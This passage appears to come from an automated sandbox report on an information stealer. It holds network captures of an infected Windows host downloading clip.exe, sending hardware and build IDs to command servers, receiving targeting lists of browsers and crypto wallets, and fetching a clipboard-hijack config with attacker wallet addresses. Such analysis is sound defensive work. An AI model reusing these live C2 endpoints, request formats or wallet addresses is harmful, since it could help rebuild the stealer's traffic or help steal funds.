                                                                                                                Oct 8, 2024 05:00:13.386560917 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386573076 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386586905 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386606932 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386620998 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386636972 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386650085 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386657953 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386665106 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386679888 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386699915 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386703968 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386713982 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386729002 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386734962 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386749029 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386759996 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386800051 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386820078 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386835098 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386842012 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386848927 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386857033 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386863947 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386873007 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386878014 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386882067 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386900902 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386924028 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386934996 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386939049 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386960030 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386961937 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386970043 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386976004 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386990070 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386997938 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387005091 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387015104 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387022972 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387037992 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387058973 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387099981 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387114048 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387136936 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387142897 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387151003 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387168884 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387217999 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387219906 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387219906 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387237072 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387237072 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387250900 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387274027 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387275934 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387288094 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387298107 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387305975 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387320042 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387336016 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387351990 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387368917 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387368917 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387418032 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387422085 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387437105 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387465954 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.387475014 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.387480974 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.152280092 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.152647018 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.152657032 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.154313087 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.154318094 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860508919 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860573053 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860586882 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860631943 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860678911 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.860722065 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860815048 CEST49882443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:16.860831022 CEST4434988249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.879749060 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.885838032 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.885900974 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.886025906 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.886065960 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:16.890921116 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.890949965 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.890997887 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.891024113 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.891165018 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:16.891191006 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:17.634572029 CEST804989145.132.206.251192.168.2.4
                                                                                                                Oct 8, 2024 05:00:17.634663105 CEST4989180192.168.2.445.132.206.251
                                                                                                                Oct 8, 2024 05:00:21.841213942 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:21.841243982 CEST4989180192.168.2.445.132.206.251
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 04:59:35.545726061 CEST | 62008 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 04:59:35.552685022 CEST | 53 | 62008 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 05:00:16.870361090 CEST | 62682 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 05:00:16.879143000 CEST | 53 | 62682 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 04:59:35.545726061 CEST | 192.168.2.4 | 1.1.1.1 | 0x2dbd | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 05:00:16.870361090 CEST | 192.168.2.4 | 1.1.1.1 | 0x8e3a | Standard query (0) | cowod.hopto.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 04:59:35.552685022 CEST | 1.1.1.1 | 192.168.2.4 | 0x2dbd | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 05:00:16.879143000 CEST | 1.1.1.1 | 192.168.2.4 | 0x8e3a | No error (0) | cowod.hopto.org |  | 45.132.206.251 | A (IP address) | IN (0x0001) | false

                                                                                                                • steamcommunity.com
                                                                                                                • 49.12.106.214
                                                                                                                • 185.215.113.117
                                                                                                                • cowod.hopto.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49857 | 185.215.113.117 | 80 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 05:00:12.083702087 CEST | 102 | OUT | GET /inc/clip.exe HTTP/1.1
Host: 185.215.113.117
Connection: Keep-Alive
Cache-Control: no-cache
Oct 8, 2024 05:00:12.784432888 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Oct 2024 03:00:12 GMT
Content-Type: application/octet-stream
Content-Length: 519680
Last-Modified: Fri, 13 Sep 2024 18:20:04 GMT
Connection: keep-alive
ETag: "66e48254-7ee00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49874 | 185.215.113.117 | 80 | 2472 | C:\Windows\SysWOW64\cmd.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 05:00:14.168716908 CEST | 203 | OUT | GET /nholman/ HTTP/1.1
User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/74.0.3729.169Safari/537.36
Host: 185.215.113.117
Cache-Control: no-cache
Oct 8, 2024 05:00:14.868470907 CEST | 471 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 08 Oct 2024 03:00:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                Data Ascii: 118{ "patterns": { "^((bc1[0-9A-Za-z]{32,64})|([13][a-km-zA-HJ-NP-Z1-9]{25,34}))$": "bc1qajmcwhljrvvhzh7gvj9llvjqu0muv08nzr2pdd", "^0x[a-fA-F0-9]{40}$": "0xE10E0C9cbD9415B587c294ACa2082c562DC649ed", "T[A-Za-z1-9]{33}": "TUT6xRHgJVLan3FWEeavPjvPGnVsm9GG67" }}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49891 | 45.132.206.251 | 80 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 05:00:16.886025906 CEST | 281 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: cowod.hopto.org
Content-Length: 5769
Connection: Keep-Alive
Cache-Control: no-cache
Oct 8, 2024 05:00:16.886065960 CEST | 5769 | OUT | Data Ascii: ------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------BFHJJJDAFBKEBG
Oct 8, 2024 05:00:17.634572029 CEST | 188 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 03:00:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Served-By: cowod.hopto.org


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 104.102.49.254 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:36 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:36 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 08 Oct 2024 02:59:36 GMT
Content-Length: 34889
Connection: close
Set-Cookie: sessionid=0e39fa0a4419d8f342677848; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                Data Ascii: ack" onclick="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:37 UTC | 186 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 02:59:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-08 02:59:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49743 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:38 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:38 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 43 37 41 37 41 37 42 45 44 31 32 35 33 31 33 31 38 31 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 4b 46 48 4a 44 42 4b 4b 45 42 46 48 44 41 41 45 2d 2d 0d
                                                                                                                Data Ascii: ------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="hwid"633C7A7A7BED1253131813-a33c7340-61ca------EBAKKFHJDBKKEBFHDAAEContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------EBAKKFHJDBKKEBFHDAAE--
2024-10-08 02:59:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-08 02:59:39 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|c2982176b812cb9215482e1d97c29975|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:40 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGID
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------DBKKKEHDHCBFIEBFBGIDCont
2024-10-08 02:59:40 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                2024-10-08 02:59:40 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49745 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:41 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 32 39 38 32 31 37 36 62 38 31 32 63 62 39 32 31 35 34 38 32 65 31 64 39 37 63 32 39 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 65 65 31 34 34 35 66 63 36 33 62 63 32 30 64 30 65 37 39 36 36 38 36 37 62 31 33 65 30 65 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74
                                                                                                                Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"c2982176b812cb9215482e1d97c29975------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="build_id"2ee1445fc63bc20d0e7966867b13e0e1------GIEBAECAKKFCBFIEGCBKCont
2024-10-08 02:59:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 02:59:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                2024-10-08 02:59:42 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49746 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 02:59:42 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
